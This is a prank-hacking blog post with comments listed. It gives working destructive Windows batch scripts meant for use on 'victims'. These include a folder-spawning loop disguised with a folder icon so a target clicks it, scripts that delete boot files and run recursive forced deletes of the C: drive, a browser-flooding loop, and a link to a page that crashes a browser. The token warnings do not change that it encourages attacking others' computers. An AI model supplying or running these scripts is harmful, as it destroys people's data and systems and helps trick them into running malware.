Deadly and Painful Hacks That You Should Never Try on Your PC

Hey guys, I’m back with my next post. If you are not a computer professional, don’t read this, even if you do. Don’t ever try this on any of your computers. Trying any of these are really painful and will take you a lot of time to recover.If you got somebody really irritating in your life and stalking you every once in a while then this is the right post for you. But please do think twice before you teach that poor soul a lesson. And once again I’m warning you. Please don’t use these if you are not sure of what your purpose of using these hacks is. Now let’s get started. These hacks are merely pranks that will frustrate your victims to the core.

1. Crash a Computer System With Nothing But a Link.

I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

Click Here. (http://tiny.cc/ibJUN)

2. Create more than 3,000 folders under a minute.

Step 1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top

Step 2) Save it as 1000.bat

@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.

Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.

Here’s what I did with my file.

If my victim clicks on the file. He’s gonna see the hottest chics that he’s never seen in his entire life don’t you think?

3) Shutdown A Computer Forever!

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.

4) Another RAM crashing Trick :

open notepad and type

:A
start www.coolpctips.com
goto A

save with .bat extension.
Infinitely loops your browser to open up coolpctips.

Do this and your victim will have infinite pages of coolpctips flooded on his computer screen.

5) Delete all your system files with just 6 character command.

Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!

email
Comments(16)
  1. vishnu July 10, 2011
    • Pranay Kotapi July 10, 2011
  2. Sushant July 11, 2011
    • Pranay Kotapi July 12, 2011
  3. Aryan July 13, 2011
  4. Robin November 7, 2011
  5. Adam October 17, 2012
  6. Adam October 17, 2012
  7. comenter January 7, 2013
  8. LQ January 16, 2013
  9. mohammed bilal a a April 22, 2014
  10. Danny Markson June 20, 2014
  11. Best Hacker June 28, 2014
  12. Changmin kang July 5, 2015

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!